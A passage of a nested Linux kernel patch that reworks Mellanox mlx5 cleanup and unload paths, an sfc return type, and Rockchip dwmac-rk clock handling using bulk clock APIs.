++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -776,6 +776,7 @@ static int mlx5e_create_promisc_table(struct mlx5e_flow_steering *fs)
+ 	ft->t = mlx5_create_auto_grouped_flow_table(fs->ns, &ft_attr);
+ 	if (IS_ERR(ft->t)) {
+ 		err = PTR_ERR(ft->t);
++		ft->t = NULL;
+ 		fs_err(fs, "fail to create promisc table err=%d\n", err);
+ 		return err;
+ 	}
+@@ -803,7 +804,7 @@ static void mlx5e_del_promisc_rule(struct mlx5e_flow_steering *fs)
+ 
+ static void mlx5e_destroy_promisc_table(struct mlx5e_flow_steering *fs)
+ {
+-	if (WARN(!fs->promisc.ft.t, "Trying to remove non-existing promiscuous table"))
++	if (!fs->promisc.ft.t)
+ 		return;
+ 	mlx5e_del_promisc_rule(fs);
+ 	mlx5_destroy_flow_table(fs->promisc.ft.t);
+@@ -1471,6 +1472,8 @@ err:
+ 
+ void mlx5e_fs_cleanup(struct mlx5e_flow_steering *fs)
+ {
++	if (!fs)
++		return;
+ 	mlx5e_fs_ethtool_free(fs);
+ 	mlx5e_fs_tc_free(fs);
+ 	mlx5e_fs_vlan_free(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 5e01de4c32037..94d010e2d5efd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5201,6 +5201,7 @@ static void mlx5e_nic_cleanup(struct mlx5e_priv *priv)
+ 	mlx5e_ktls_cleanup(priv);
+ 	mlx5e_ipsec_cleanup(priv);
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 0f744131c6869..9bd1a93a512d4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -783,6 +783,7 @@ static void mlx5e_cleanup_rep(struct mlx5e_priv *priv)
+ {
+ 	mlx5e_fs_cleanup(priv->fs);
+ 	mlx5e_ipsec_cleanup(priv);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_create_rep_ttc_table(struct mlx5e_priv *priv)
+@@ -949,6 +950,7 @@ err_close_drop_rq:
+ 	priv->rx_res = NULL;
+ err_free_fs:
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+index 9e72118f2e4c0..749c3957a1280 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+@@ -11,7 +11,7 @@ struct mlx5_vport_key {
+ 	u16 prio;
+ 	u16 vport;
+ 	u16 vhca_id;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ } __packed;
+ 
+ struct mlx5_vport_table {
+@@ -21,6 +21,14 @@ struct mlx5_vport_table {
+ 	struct mlx5_vport_key key;
+ };
+ 
++static void
++esw_vport_tbl_init(struct mlx5_eswitch *esw, struct esw_vport_tbl_namespace *ns)
++{
++	if (esw->offloads.encap != DEVLINK_ESWITCH_ENCAP_MODE_NONE)
++		ns->flags |= (MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT |
++			      MLX5_FLOW_TABLE_TUNNEL_EN_DECAP);
++}
++
+ static struct mlx5_flow_table *
+ esw_vport_tbl_create(struct mlx5_eswitch *esw, struct mlx5_flow_namespace *ns,
+ 		     const struct esw_vport_tbl_namespace *vport_ns)
+@@ -80,6 +88,7 @@ mlx5_esw_vporttbl_get(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &skey);
+ 	e = esw_vport_tbl_lookup(esw, &skey, hkey);
+ 	if (e) {
+@@ -127,6 +136,7 @@ mlx5_esw_vporttbl_put(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &key);
+ 	e = esw_vport_tbl_lookup(esw, &key, hkey);
+ 	if (!e || --e->num_rules)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 5db76af35d3f5..6e6e0864063f1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -668,7 +668,7 @@ struct mlx5_vport_tbl_attr {
+ 	u32 chain;
+ 	u16 prio;
+ 	u16 vport;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ };
+ 
+ struct mlx5_flow_table *
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 64e5b9f29206e..519526a4810ef 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -72,7 +72,7 @@
+ 
+ #define MLX5_ESW_FT_OFFLOADS_DROP_RULE (1)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE,
+ 	.max_num_groups = MLX5_ESW_VPORT_TBL_NUM_GROUPS,
+ 	.flags = 0,
+@@ -733,7 +733,6 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 	kfree(dest);
+ 	return rule;
+ err_chain_src_rewrite:
+-	esw_put_dest_tables_loop(esw, attr, 0, i);
+ 	mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ err_get_fwd:
+ 	mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+@@ -776,7 +775,6 @@ __mlx5_eswitch_del_rule(struct mlx5_eswitch *esw,
+ 	if (fwd_rule)  {
+ 		mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ 		mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+-		esw_put_dest_tables_loop(esw, attr, 0, esw_attr->split_count);
+ 	} else {
+ 		if (split)
+ 			mlx5_esw_vporttbl_put(esw, &fwd_attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index 1e46f9afa40e0..d219f8417d93a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -150,11 +150,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
+ 		complete(&fw_reset->done);
+ 	} else {
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 		if (mlx5_health_wait_pci_up(dev))
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+-			mlx5_load_one(dev, false);
++			mlx5_load_one(dev, true);
+ 		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
+@@ -484,8 +484,8 @@ int mlx5_fw_reset_wait_reset_done(struct mlx5_core_dev *dev)
+ 	}
+ 	err = fw_reset->ret;
+ 	if (test_and_clear_bit(MLX5_FW_RESET_FLAGS_RELOAD_REQUIRED, &fw_reset->reset_flags)) {
+-		mlx5_unload_one_devl_locked(dev);
+-		mlx5_load_one_devl_locked(dev, false);
++		mlx5_unload_one_devl_locked(dev, false);
++		mlx5_load_one_devl_locked(dev, true);
+ 	}
+ out:
+ 	clear_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 879555ba847dd..e42e4ac231c64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -699,7 +699,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 		 * requests from the kernel.
+ 		 */
+ 		mlx5_core_err(dev, "Driver is in error state. Unloading\n");
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 59914f66857da..cc8057c4f9080 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1495,12 +1495,12 @@ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery)
+ 	return ret;
+ }
+ 
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev)
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	devl_assert_locked(priv_to_devlink(dev));
+ 	mutex_lock(&dev->intf_state_mutex);
+ 
+-	mlx5_detach_device(dev);
++	mlx5_detach_device(dev, suspend);
+ 
+ 	if (!test_bit(MLX5_INTERFACE_STATE_UP, &dev->intf_state)) {
+ 		mlx5_core_warn(dev, "%s: interface is down, NOP\n",
+@@ -1515,12 +1515,12 @@ out:
+ 	mutex_unlock(&dev->intf_state_mutex);
+ }
+ 
+-void mlx5_unload_one(struct mlx5_core_dev *dev)
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	devl_lock(devlink);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, suspend);
+ 	devl_unlock(devlink);
+ }
+ 
+@@ -1793,7 +1793,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+@@ -1950,7 +1950,7 @@ static void shutdown(struct pci_dev *pdev)
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	err = mlx5_try_fast_unload(dev);
+ 	if (err)
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	mlx5_pci_disable_device(dev);
+ }
+ 
+@@ -1958,7 +1958,7 @@ static int mlx5_suspend(struct pci_dev *pdev, pm_message_t state)
+ {
+ 	struct mlx5_core_dev *dev = pci_get_drvdata(pdev);
+ 
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 
+ 	return 0;
+ }
+@@ -2001,7 +2001,7 @@ MODULE_DEVICE_TABLE(pci, mlx5_core_pci_table);
+ void mlx5_disable_device(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, false);
+ }
+ 
+ int mlx5_recover_device(struct mlx5_core_dev *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index a806e3de7b7c3..1a35b3c2a3674 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -236,7 +236,7 @@ void mlx5_adev_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_adev_init(struct mlx5_core_dev *dev);
+ 
+ int mlx5_attach_device(struct mlx5_core_dev *dev);
+-void mlx5_detach_device(struct mlx5_core_dev *dev);
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_register_device(struct mlx5_core_dev *dev);
+ void mlx5_unregister_device(struct mlx5_core_dev *dev);
+ struct mlx5_core_dev *mlx5_get_next_phys_dev_lag(struct mlx5_core_dev *dev);
+@@ -319,8 +319,8 @@ int mlx5_mdev_init(struct mlx5_core_dev *dev, int profile_idx);
+ void mlx5_mdev_uninit(struct mlx5_core_dev *dev);
+ int mlx5_init_one(struct mlx5_core_dev *dev);
+ void mlx5_uninit_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev);
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend);
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery);
+ int mlx5_load_one_devl_locked(struct mlx5_core_dev *dev, bool recovery);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index 7b4783ce213e2..a7377619ba6f2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -74,7 +74,7 @@ static void mlx5_sf_dev_shutdown(struct auxiliary_device *adev)
+ {
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 
+-	mlx5_unload_one(sf_dev->mdev);
++	mlx5_unload_one(sf_dev->mdev, false);
+ }
+ 
+ static const struct auxiliary_device_id mlx5_sf_dev_id_table[] = {
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.c b/drivers/net/ethernet/sfc/ef100_tx.c
+index 102ddc7e206a7..29ffaf35559d6 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.c
++++ b/drivers/net/ethernet/sfc/ef100_tx.c
+@@ -367,7 +367,8 @@ void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+  * Returns 0 on success, error code otherwise. In case of an error this
+  * function will free the SKB.
+  */
+-int ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb)
++netdev_tx_t ef100_enqueue_skb(struct efx_tx_queue *tx_queue,
++			      struct sk_buff *skb)
+ {
+ 	return __ef100_enqueue_skb(tx_queue, skb, NULL);
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+index 6656d76b6766b..cf682a9e3fff2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+@@ -39,6 +39,24 @@ struct rk_gmac_ops {
+ 	u32 regs[];
+ };
+ 
++static const char * const rk_clocks[] = {
++	"aclk_mac", "pclk_mac", "mac_clk_tx", "clk_mac_speed",
++};
++
++static const char * const rk_rmii_clocks[] = {
++	"mac_clk_rx", "clk_mac_ref", "clk_mac_refout",
++};
++
++enum rk_clocks_index {
++	RK_ACLK_MAC = 0,
++	RK_PCLK_MAC,
++	RK_MAC_CLK_TX,
++	RK_CLK_MAC_SPEED,
++	RK_MAC_CLK_RX,
++	RK_CLK_MAC_REF,
++	RK_CLK_MAC_REFOUT,
++};
++
+ struct rk_priv_data {
+ 	struct platform_device *pdev;
+ 	phy_interface_t phy_iface;
+@@ -51,15 +69,9 @@ struct rk_priv_data {
+ 	bool clock_input;
+ 	bool integrated_phy;
+ 
++	struct clk_bulk_data *clks;
++	int num_clks;
+ 	struct clk *clk_mac;
+-	struct clk *gmac_clkin;
+-	struct clk *mac_clk_rx;
+-	struct clk *mac_clk_tx;
+-	struct clk *clk_mac_ref;
+-	struct clk *clk_mac_refout;
+-	struct clk *clk_mac_speed;
+-	struct clk *aclk_mac;
+-	struct clk *pclk_mac;
+ 	struct clk *clk_phy;
+ 
+ 	struct reset_control *phy_reset;
+@@ -104,10 +116,11 @@ static void px30_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	int ret;
+ 
+-	if (IS_ERR(bsp_priv->clk_mac_speed)) {
++	if (!clk_mac_speed) {
+ 		dev_err(dev, "%s: Missing clk_mac_speed clock\n", __func__);
+ 		return;
+ 	}
+@@ -116,7 +129,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_10M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 2500000);
++		ret = clk_set_rate(clk_mac_speed, 2500000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 2500000 failed: %d\n",
+ 				__func__, ret);
+@@ -124,7 +137,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_100M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 25000000);
++		ret = clk_set_rate(clk_mac_speed, 25000000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 25000000 failed: %d\n",
+ 				__func__, ret);
+@@ -1066,6 +1079,7 @@ static void rk3568_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1085,7 +1099,7 @@ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1371,6 +1385,7 @@ static void rv1126_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1390,7 +1405,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1398,6 +1413,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 
+ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1414,7 +1430,7 @@ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1475,68 +1491,50 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ {
+ 	struct rk_priv_data *bsp_priv = plat->bsp_priv;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+-	int ret;
++	int phy_iface = bsp_priv->phy_iface;
++	int i, j, ret;
+ 
+ 	bsp_priv->clk_enabled = false;
+ 
+-	bsp_priv->mac_clk_rx = devm_clk_get(dev, "mac_clk_rx");
+-	if (IS_ERR(bsp_priv->mac_clk_rx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_rx");
++	bsp_priv->num_clks = ARRAY_SIZE(rk_clocks);
++	if (phy_iface == PHY_INTERFACE_MODE_RMII)
++		bsp_priv->num_clks += ARRAY_SIZE(rk_rmii_clocks);
+ 
+-	bsp_priv->mac_clk_tx = devm_clk_get(dev, "mac_clk_tx");
+-	if (IS_ERR(bsp_priv->mac_clk_tx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_tx");
++	bsp_priv->clks = devm_kcalloc(dev, bsp_priv->num_clks,
++				      sizeof(*bsp_priv->clks), GFP_KERNEL);
++	if (!bsp_priv->clks)
++		return -ENOMEM;
+ 
+-	bsp_priv->aclk_mac = devm_clk_get(dev, "aclk_mac");
+-	if (IS_ERR(bsp_priv->aclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"aclk_mac");
++	for (i = 0; i < ARRAY_SIZE(rk_clocks); i++)
++		bsp_priv->clks[i].id = rk_clocks[i];
+ 
+-	bsp_priv->pclk_mac = devm_clk_get(dev, "pclk_mac");
+-	if (IS_ERR(bsp_priv->pclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"pclk_mac");
+-
+-	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
+-	if (IS_ERR(bsp_priv->clk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"stmmaceth");
+-
+-	if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII) {
+-		bsp_priv->clk_mac_ref = devm_clk_get(dev, "clk_mac_ref");
+-		if (IS_ERR(bsp_priv->clk_mac_ref))
+-			dev_err(dev, "cannot get clock %s\n",
+-				"clk_mac_ref");
+-
+-		if (!bsp_priv->clock_input) {
+-			bsp_priv->clk_mac_refout =
+-				devm_clk_get(dev, "clk_mac_refout");
+-			if (IS_ERR(bsp_priv->clk_mac_refout))
+-				dev_err(dev, "cannot get clock %s\n",
+-					"clk_mac_refout");
+-		}
++	if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		for (j = 0; j < ARRAY_SIZE(rk_rmii_clocks); j++)
++			bsp_priv->clks[i++].id = rk_rmii_clocks[j];
+ 	}
+ 
+-	bsp_priv->clk_mac_speed = devm_clk_get(dev, "clk_mac_speed");
+-	if (IS_ERR(bsp_priv->clk_mac_speed))
+-		dev_err(dev, "cannot get clock %s\n", "clk_mac_speed");
++	ret = devm_clk_bulk_get_optional(dev, bsp_priv->num_clks,
++					 bsp_priv->clks);
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get clocks\n");
++
++	/* "stmmaceth" will be enabled by the core */
++	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
++	ret = PTR_ERR_OR_ZERO(bsp_priv->clk_mac);
++	if (ret)
++		return dev_err_probe(dev, ret, "Cannot get stmmaceth clock\n");
+ 
+ 	if (bsp_priv->clock_input) {
+ 		dev_info(dev, "clock input from PHY\n");
+-	} else {
+-		if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII)
+-			clk_set_rate(bsp_priv->clk_mac, 50000000);
++	} else if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		clk_set_rate(bsp_priv->clk_mac, 50000000);
+ 	}
+ 
+ 	if (plat->phy_node && bsp_priv->integrated_phy) {
+ 		bsp_priv->clk_phy = of_clk_get(plat->phy_node, 0);
+-		if (IS_ERR(bsp_priv->clk_phy)) {
+-			ret = PTR_ERR(bsp_priv->clk_phy);
+-			dev_err(dev, "Cannot get PHY clock: %d\n", ret);
+-			return -EINVAL;
+-		}
++		ret = PTR_ERR_OR_ZERO(bsp_priv->clk_phy);
++		if (ret)
++			return dev_err_probe(dev, ret, "Cannot get PHY clock\n");
+ 		clk_set_rate(bsp_priv->clk_phy, 50000000);
+ 	}
+ 
+@@ -1545,77 +1543,36 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ 
+ static int gmac_clk_enable(struct rk_priv_data *bsp_priv, bool enable)
+ {
+-	int phy_iface = bsp_priv->phy_iface;
++	int ret;
+ 
+ 	if (enable) {
+ 		if (!bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				if (!IS_ERR(bsp_priv->mac_clk_rx))
+-					clk_prepare_enable(
+-						bsp_priv->mac_clk_rx);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_ref))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_ref);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_refout))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_refout);
+-			}
+-
+-			if (!IS_ERR(bsp_priv->clk_phy))
+-				clk_prepare_enable(bsp_priv->clk_phy);
++			ret = clk_bulk_prepare_enable(bsp_priv->num_clks,
++						      bsp_priv->clks);
++			if (ret)
++				return ret;
+ 
+-			if (!IS_ERR(bsp_priv->aclk_mac))
+-				clk_prepare_enable(bsp_priv->aclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->pclk_mac))
+-				clk_prepare_enable(bsp_priv->pclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->mac_clk_tx))
+-				clk_prepare_enable(bsp_priv->mac_clk_tx);
+-
+-			if (!IS_ERR(bsp_priv->clk_mac_speed))
+-				clk_prepare_enable(bsp_priv->clk_mac_speed);
++			ret = clk_prepare_enable(bsp_priv->clk_phy);
++			if (ret)
++				return ret;
+ 
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					       bsp_priv->clock_input, true);
+ 
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_prepare_enable(bsp_priv->clk_mac);
+-			 */
+ 			mdelay(5);
+ 			bsp_priv->clk_enabled = true;
+ 		}
+ 	} else {
+ 		if (bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				clk_disable_unprepare(bsp_priv->mac_clk_rx);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_ref);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_refout);
+-			}
+-
++			clk_bulk_disable_unprepare(bsp_priv->num_clks,
++						   bsp_priv->clks);
+ 			clk_disable_unprepare(bsp_priv->clk_phy);
+ 
+-			clk_disable_unprepare(bsp_priv->aclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->pclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->mac_clk_tx);
+-
+-			clk_disable_unprepare(bsp_priv->clk_mac_speed);
+-
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					      bsp_priv->clock_input, false);
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_disable_unprepare(bsp_priv->clk_mac);
+-			 */
++
+ 			bsp_priv->clk_enabled = false;
+ 		}
+ 	}
+@@ -1629,9 +1586,6 @@ static int phy_power_on(struct rk_priv_data *bsp_priv, bool enable)
+ 	int ret;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 
+-	if (!ldo)
+-		return 0;
+-
+ 	if (enable) {
+ 		ret = regulator_enable(ldo);
+ 		if (ret)
+@@ -1679,14 +1633,11 @@ static struct rk_priv_data *rk_gmac_setup(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	bsp_priv->regulator = devm_regulator_get_optional(dev, "phy");
++	bsp_priv->regulator = devm_regulator_get(dev, "phy");
+ 	if (IS_ERR(bsp_priv->regulator)) {
+-		if (PTR_ERR(bsp_priv->regulator) == -EPROBE_DEFER) {
+-			dev_err(dev, "phy regulator is not available yet, deferred probing\n");
+-			return ERR_PTR(-EPROBE_DEFER);
+-		}
+-		dev_err(dev, "no regulator found\n");
+-		bsp_priv->regulator = NULL;
++		ret = PTR_ERR(bsp_priv->regulator);
++		dev_err_probe(dev, ret, "failed to get phy regulator\n");
++		return ERR_PTR(ret);
+ 	}
+ 
+ 	ret = of_property_read_string(dev->of_node, "clock_in_out", &strings);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index fa3ce3b0d9a56..4903157230621 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6346,6 +6346,10 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	bool is_double = false;
